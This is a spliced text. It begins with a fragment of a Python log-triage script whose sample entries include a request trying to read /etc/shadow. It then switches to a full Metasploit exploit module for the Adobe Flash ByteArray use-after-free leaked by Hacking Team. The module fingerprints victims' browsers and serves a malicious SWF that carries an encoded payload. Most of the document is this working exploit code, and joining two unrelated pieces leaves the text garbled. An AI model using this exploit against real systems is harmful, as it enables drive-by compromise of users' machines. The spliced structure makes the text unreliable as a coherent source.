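    '198.51.100.7 - - [05/Jul/2015:10:00:04 +0000] "GET /cgi-bin/webproc?var:page=wizard&getpage=/etc/shadow HTTP/1.1" 200 300',
    '192.0.2.9 - - [05/Jul/2015:10:00:05 +0000] "GET /index.php?option=com_hello&controller=default HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.client:14s} {f.kind:20s} {f.parameter:10s} {f.evidence!r}")
```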
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ByteArray Use After Free',
      'Description'         => %q{
        This module exploits a use after free in Adobe Flash Player. The vulnerability,
        discovered by Hacking Team and made public in its July 2015 data leak, was
        described as a Use After Free while handling ByteArray objects. This module has
        been tested successfully on:

        Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Someone from HackingTeam
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
          ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['win', 'linux'],
      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81 ||
              os =~ OperatingSystems::Match::WINDOWS_VISTA ||
              os =~ OperatingSystems::Match::WINDOWS_XP
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          :flash   => lambda do |ver|
            case target.name
            when 'Windows'
              # Note: Chrome might be vague about the version.
              # Instead of 18.0.0.203, it just says 18.0
              return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
            when 'Linux'
              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
            end

            false
          end
        },
      'Targets'             =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Jul 06 2015',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf

    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    os_name = target_info[:os_name]

    if target.name =~ /Windows/
      platform_id = 'win'
    elsif target.name =~ /Linux/
      platform_id = 'linux'
    end

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')
    swf = ::File.open(path, 'rb') { |f| f.read }

    swf
  end
end